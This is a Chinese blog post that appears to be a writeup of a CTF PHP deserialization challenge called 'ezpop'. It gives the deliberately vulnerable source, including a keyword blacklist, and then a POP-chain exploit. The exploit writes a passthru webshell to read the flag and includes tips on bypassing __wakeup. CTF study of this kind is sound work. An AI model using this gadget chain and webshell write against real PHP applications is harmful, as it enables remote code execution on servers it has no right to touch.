CTF新生杯PHP反序列化题——ezpop

最新推荐文章于 2024-04-28 18:08:34 发布

白给、少年

最新推荐文章于 2024-04-28 18:08:34 发布

阅读量916

点赞数

分类专栏： CTF题目文章标签： php 开发语言后端

本文链接：https://blog.csdn.net/qq_36935691/article/details/123149024

版权

CTF题目专栏收录该内容

1 篇文章 0 订阅

订阅专栏

题目源码：

<?php
error_reporting(0);
class openfunc{
    public $object;
    function __construct(){
        $this->object=new normal();
    }
    function __wakeup(){
        $this->object=new normal();
    }
    function __destruct(){
        $this->object->action();
    }
}
abstract class hack {

    abstract public function pass();

    public function action() {
        $this->pass();
    }
}
class normal{
    public $d;
    function action(){
        echo "you must bypass it";
    }
}
class evil extends hack{
    public $data;
    public $a;
    public $b; 
    public $c;
    public function pass(){
        $this->a = unserialize($this->b);
        $this->a->d =urldecode(date($this->c));
        if($this->a->d === 'shell'){
           $this->shell();
        }
        else{
            die(date('Y/m/d H:i:s'));
        }
    }
    function shell(){
        if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump|php/i',$this->data)){
            die("you die");
        }
        $dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
        if(!file_exists($dir)){
            mkdir($dir);
            echo $dir;
        }
        file_put_contents("$dir" . "hack.php", $this->data);
    }
}

if (isset($_GET['Xp0int']))  
{
    $Data = unserialize(base64_decode($_GET['Xp0int']));
} 
else 
{ 
    highlight_file(__file__); 
}

wp：

<?php
class openfunc{
    public $object;
    function __construct(){
        $this->object=new evil();
    }
    function __wakeup(){
        $this->object=new normal();
    }
    function __destruct(){
        $this->object->action();
    }
}
abstract class hack {

    abstract public function pass();

    public function action() {
        $this->pass();
    }
}
class normal{
    public $d;
    function action(){
        echo "you must bypass it";
    }
} 
class evil extends hack {
    public $data;
    public $a;
    public $b;
    public $c;
    function __construct(){
        $this->data='<?=passthru("sort /fffffl?ggggg");?>';
        $this->b=serialize(new normal());
        $this->c='%73%68%65%6C%6C';
    }
    public function pass(){
        $this->a = unserialize($this->b);
        $this->a->d = urldecode(date($this->c));
        if($this->a->d=== 'shell'){
           $this->shell();
        }
        else{
            die(date('Y/m/d H:i:s'));
        }
    }
    function shell(){
        if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump|php/i',$this->data)){
            die("you die");
        }
        $dir = 'scandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
        if(!file_exists($dir)){
            mkdir($dir);
            echo $dir;
        }
        file_put_contents("$dir" . "hack.php", $this->data);
    }
}
$a=serialize(new Openfunc());
echo $a;
//先对生成的$a，要对参数进行修改从而绕过wakeup函数
//然后将$a进行base64编码，来模拟数据通过浏览器发送的过程
//最后将生成的hack.php路径进行访问即可

?>

白给、少年

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
CTF新生杯PHP反序列化题——ezpop

题目源码：<?phperror_reporting(0);class openfunc{ public $object; function __construct(){ $this->object=new normal(); } function __wakeup(){ $this->object=new normal(); } function __destruct(){ $this
复制链接

扫一扫

专栏目录